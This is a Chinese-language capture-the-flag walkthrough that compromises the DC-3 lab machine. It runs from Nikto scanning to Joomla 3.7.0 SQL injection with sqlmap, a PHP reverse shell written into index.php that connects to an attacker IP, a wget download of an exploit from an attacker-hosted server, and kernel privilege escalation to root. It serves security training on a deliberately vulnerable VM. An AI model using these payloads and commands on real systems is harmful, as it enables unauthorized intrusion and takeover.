一,工具学习
(1)nikto扫描器
工具用途
- Nikto是一款开源的web服务器扫描器它可以对网页服务器进行全面的多种扫描
.
常用操作
- 扫描站点目录
.
常用选项
nikto -host [IP]
(2)JoomScan
JoomScan:一款开源的OWASP的 Joomla ( CMS ) 漏洞扫描器
(3)???searchsploit漏洞查询工具
作用
- 搜索所有的漏洞和shellcode
.
常用选项
searchsploit XXXX
二,测试流程
(1)信息收集
使用nikto扫描目录
root@kali:~# nikto -host 192.168.44.130
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.44.130
+ Target Hostname: 192.168.44.130
+ Target Port: 80
+ Start Time: 2019-09-18 01:20:09 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server leaks inodes via ETags, header found with file /bin/, fields: 0x1f 0x54dfee2e147c0
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is "http://127.0.1.1/images/".
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-8193: /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc: EW FileManager for PostNuke allows arbitrary file retrieval.
+ OSVDB-3092: /administrator/: This might be interesting...
+ OSVDB-3092: /bin/: This might be interesting...
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3092: /bin/: This might be interesting... possibly a system shell found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.
+ /administrator/index.php: Admin login page/section found.
+ 8347 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time: 2019-09-18 01:20:40 (GMT-4) (31 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
因为得到CMS是joomla(成熟cms),使用相关的扫描工具。
用searchsploit搜索
root@kali:~# searchsploit Joomla 3.7.0
------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------- ----------------------------------------
Joomla! 3.7.0 - 'com_fields' SQL Injection | exploits/php/webapps/42033.txt
------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
发现有注入漏洞
查看这个文本文件
root@kali:~# cat /usr/share/exploitdb/exploits/php/webapps/42033.txt
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917
URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
Using Sqlmap:
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
Parameter: list[fullordering] (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (DUAL)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)
用sqlmap进行爆库
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -v 3
sqlmap爆出数据
爆出表名
爆出字段
爆出内容
对加密的数据破解
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
(2)web渗透
【思路】
用system()执行bash -c
用bash发起一个shell
kali监听
访问index.php执行脚本
反弹shell成功 --> 提权到root
<?php
system("bash -c 'bash -i >& /dev/tcp/192.168.44.128/8080 0>&1' ");
?>
①编辑index.php,写入反弹shell代码
②kail监听
③访问index.php,kali上getshell
对应版本为Ubuntu 16.04
用searchsploit搜索可以利用的漏洞
root@kali:~# searchsploit Ubuntu 16.04
--------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------- ----------------------------------------
Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - | exploits/linux/local/40937.txt
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Pri | exploits/linux/local/40054.c
Google Chrome (Fedora 25 / Ubuntu 16.04) - ' | exploits/linux/local/40943.txt
LightDM (Ubuntu 16.04/16.10) - 'Guest Accoun | exploits/linux/local/41923.txt
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14 | exploits/linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/1 | exploits/linux_x86/local/42276.c
Linux Kernel (Ubuntu 16.04) - Reference Coun | exploits/linux/dos/39773.txt
Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7 | exploits/linux/local/45175.c
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Loca | exploits/linux/local/40759.rb
Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer | exploits/linux/dos/46529.c
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-6 | exploits/linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - N | exploits/linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14. | exploits/linux/local/47170.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double- | exploits/linux/local/39772.txt
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_ | exploits/linux/local/40489.txt
Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp | exploits/linux/dos/45919.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora | exploits/linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - | exploits/linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - | exploits/linux/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu | exploits/linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/ | exploits/linux/local/47169.c
--------------------------------------------- ----------------------------------------
Shellcodes: No Result
可以自己搭建一个ubuntu16.04的环境测试后使用39772进行提权
(3)提权
由于得到靶机的shell内无法下载github的39772
在kali上下载,用python开启简单的服务器
python -m SimpleHTTPServer 9000
之后在得到的shell里下载并执行
①下载
www-data@DC-3:/var/www/html$ wget http://192.168.44.128:9000/exploit.tar
wget http://192.168.44.128:9000/exploit.tar
--2019-09-19 02:00:44-- http://192.168.44.128:9000/exploit.tar
Connecting to 192.168.44.128:9000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-tar]
Saving to: 'exploit.tar'
0K .......... .......... 100% 587M=0s
2019-09-19 02:00:44 (587 MB/s) - 'exploit.tar' saved [20480/20480]
之后执行
tar -xvf exploit.tar
./compile.sh
./doubleput
get到root权限
bash -i
bash: cannot set terminal process group (1193): Inappropriate ioctl for device
bash: no job control in this shell
root@DC-3:/root# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root@DC-3:/root# ls
ls
the-flag.txt
root@DC-3:/root# cat the-flag.txt
cat the-flag.txt
__ __ _ _ ____ _ _ _ _
\ \ / /__| | | | _ \ ___ _ __ ___| | | | |
\ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
\ V V / __/ | | | |_| | (_) | | | | __/_|_|_|_|
\_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)
Congratulations are in order. :-)
I hope you've enjoyed this challenge as I enjoyed making it.
If there are any ways that I can improve these little challenges,
please let me know.
As per usual, comments and complaints can be sent via Twitter to @DCAU7
Have a great day!!!!
root@DC-3:/root#
